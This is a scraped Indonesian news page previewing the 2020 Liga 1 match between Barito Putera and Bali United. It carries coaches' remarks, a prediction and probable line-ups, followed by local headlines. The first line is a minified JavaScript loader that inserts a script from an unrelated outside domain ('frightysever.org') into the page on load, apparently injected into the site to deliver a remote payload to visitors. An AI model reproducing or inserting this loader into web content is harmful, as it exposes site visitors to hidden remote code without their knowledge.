(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Laga Dua Tim Terluka


KANALKALIMANTAN.COM, MARTAPURA – Barito Putera versus Bali United, laga pekan kedua Liga 1 2020, akan digelar di Stadion Demang Lehman, Martapura, Jumat (6/3/2020) pukul 18.30 WIB. Kebobolan empat gol dalam penampilan perdana, Laskar Antasari kali ini bakal mengantisipasi bola mati. Kekalahan 4-0 dari Madura United menjadi catatan buruk bagi Barito Putera musim ini. Mengawali kompetisi baru, Laskar Antasari harus pulang dengan angka kebobolan tertinggi di Liga 1 2020 pekan pertama.

Kali ini, Alexander Rakic dan kolega akan menjamu Bali United. Menindak lanjuti capaian anak asuhnya, Djajang Nurjaman selaku arsitek tim bakal mewaspadai bola-bola mati yang dihasilkan oleh lawan. Antisipasi terhadap eksekusi bola mati pun tampaknya bakal menjadi perhatian serius bagi Djanur, sapaan akrab sang juru taktik. “Bali United memiliki beberapa pemain tinggi dan mereka sangat bagus dalam hal bola mati. Disana ada Spaso [Ilija Spasojevic], Melvin Platje, Willian Pacheco, dan Leonard Tupamahu juga kalau mereka ikut naik,” beber Djanur, dilansir laman resmi klub, Kamis (5/3). Bahkan, Djanur pun mengakui kehebatan tim asal Bali tersebut.

“Bali United tim yang bagus. Banyak pemain-pemain hebat yang mereka pertahankan di musim ini,” kata dia.

Apalagi ujar Djanur saat di pekan pertama Bali United gagal meraih poin penuh setelah ditahan imbang 0-0 tim promosi Persita Tanggerang di Stadion Dipta Gianyar, Minggu (1/3/2020) malam.

Pelatih Bali United, Stefano Cugurra Teco, berharap wasit bisa lebih jeli dalam memimpin partai melawan Barito Putera pada pekan kedua Liga 1 2020 di Stadion Demang Lehman, Martapura, Jumat (6/3/20). Teco tak ingin kenangan buruk yang pernah terjadi di kandang Barito Putera di Liga 1 musim lalu terulang kembali.

Teco begitu kesal ketika musim lalu dikalahkan Barito Putera 1-0. Bukan karena Barito Putera menjadi tim pertama yang mengalahkan mereka, namun Teco melihat wasit melakukan kesalahan fatal. Kekesalan berawal dari gol Melvin Platje yang dianulir karena offside. Padahal, dalam tayangan ulang, penyerang asal Belanda itu jelas-jelas onside.

Justru gol tunggal Barito Putera, dalam tayangan ulang video pertandingan terlihat offside. Rafael Silva dalam posisi offside saat Rizky Pora melakukan tendangan bebas.

“Mudah-mudahan wasit tidak ganggu seperti musim lalu. Sangat kecewa waktu itu,” ucap Teco, Senin (2/3/20).

Menilik dari laga di pekan perdana, kedua tim sama-sama tak mendapat hasil baik. Bagi tuan rumah Barito Putera, pekan perdana layaknya neraka karena harus takluk 0-4 dari Madura United

Pun yang sama dirasakan Bali United. Meski tak mendapat kekalahan, namun Serdadu Tridatu harus menahan malu karena hanya ditahan imbang tim promosi, Persita Tangerang, di pekan perdana.

Mengingat hasil di pekan pertama, kedua tim tentu akan tampil menggila di pekan kedua. Apalagi baik Barito Putera dan Bali United akan mencoba meraih poin tiga perdana di musim 2020 ini.

Bali United tentu akan diunggulkan. Dengan materi yang hampir sama dengan musim lalu, Serdadu Tridatu akan mencoba memainkan komposisi terbaiknya pada laga melawan Barito Putera.

Namun tuan rumah bukan berarti akan mudah dikalahkan. Setelah dihempaskan oleh Madura United, Laskar Antasari tentu mendapat pelajaran penting yang berguna untuk menghadapi Bali United.

Prediksi Jalannya Pertandingan

Sektor pertahanan memang menjadi PR besar bagi Barito Putera. Meskipun demikian, lini depan juga perlu diasah ketajamannya demi menghasilkan gol dan meraih kemenangan. Tampil perdana di kandang sendiri, Laskar Antasari diprediksi tetap tampil menyerang demi mengamankan poin penuh. Sementara Bali United yang berpeluang turun dengan kekuatan utama, juga memiliki target menggapai tiga angka pertama usai gagal melakukannya di kandang sendiri. Datang dengan status juara musim lalu, Serdadu Tridatu pun diprediksi tetap tampil all out untuk mencuri poin atas tuan rumah.

Perkiraan Susunan Pemain

Barito Putera (4-3-3): Adhitya Harlan; Casssio de Jesus, OK John, Kurniawan Karman, Reva Adi Utama; Danilo Sekulic, Yashir Pinto, Amrizal Umanailo; Ilham Udin, Riski Pora, Alexander Rakic.

Bali United (4-3-3): Wawan Hendrawan; I Made Andhika Wijaya, Willian Pacecho, Leonard Tupamahu, Ricky Fajrin; Fadil Sausu, Brwa Nouri, Sidik Saimima; Stefano Lilipaly, M Rachmat, Melvin Platje. (Kanalkalimantan/andy)

 

 

Reporter : Andy
Editor : Bie

 


Desy Arfianty

Recent Posts

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

2 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

3 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

3 jam ago

Cabang Musabaqah Syarhil Qur’an Kafilah HSU Putra Putri Lolos ke Final

KANALKALIMANTAN.COM, RANTAU - Hari ketiga Musabaqah Tilawatil Quran (MTQ) Nasional XXXV tingkat Provinsi Kalimantan Selatan… Read More

4 jam ago

65 Peserta Calon Guru Penggerak di Kabupaten Banjar Ikuti Lokakarya

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur mengingatkan para tenaga pengajar bahwa yantangan di… Read More

5 jam ago

Bupati Banjar Buka Temu Teknis Penyuluh Pertanian se Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur membuka Temu Teknis Penyuluh Pertanian se Kabupaten… Read More

5 jam ago

This website uses cookies.